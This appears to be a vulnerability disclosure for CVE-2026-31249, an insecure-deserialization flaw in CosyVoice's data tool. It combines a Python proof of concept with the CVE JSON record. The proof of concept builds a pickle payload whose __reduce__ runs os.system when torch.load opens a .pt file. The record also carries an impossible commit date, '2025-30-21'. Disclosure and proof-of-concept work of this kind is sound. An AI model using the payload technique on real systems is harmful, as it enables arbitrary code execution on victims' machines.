CVE-2026-31249

import torch import os import pickle # Simulate the creation of a malicious payload # This class defines what happens when the object is deserialized class MaliciousPayload: def __reduce__(self): # Return a tuple (callable, args) that will be executed # Example: creating a file to prove code execution return (os.system, ('touch /tmp/pwned_by_cve_2026_31249',)) # Generate the malicious .pt file print("[+] Generating malicious .pt file...") malicious_data = MaliciousPayload() # Save the object using torch.save (which uses pickle internally) with open('malicious_embeddings.pt', 'wb') as f: torch.save(malicious_data, f) print("[+] File 'malicious_embeddings.pt' created.") # --- VULNERABLE CODE SIMULATION --- # This mimics the code in make_parquet_list.py print("[+] Simulating victim processing the file...") try: # The vulnerable call: loading untrusted data without weights_only=True loaded_data = torch.load('malicious_embeddings.pt') print("[!] Exploit failed or code executed silently.") except Exception as e: print(f"[!] Error during load: {e}")

{"cve": {"id": "CVE-2026-31249", "sourceIdentifier": "[email protected]", "published": "2026-05-11T17:16:19.820", "lastModified": "2026-05-12T18:16:53.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its make_parquet_list.py data processing tool. The script loads PyTorch .pt files (utterance embeddings, speaker embeddings, speech tokens) using torch.load() without enabling the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing malicious .pt files within a data directory. When a victim processes this directory using the tool, arbitrary code is executed on the victim's system."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/FunAudioLLM/CosyVoice", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31249-35d1e13931888112af48f0bddf18f0b9", "source": "[email protected]"}]}}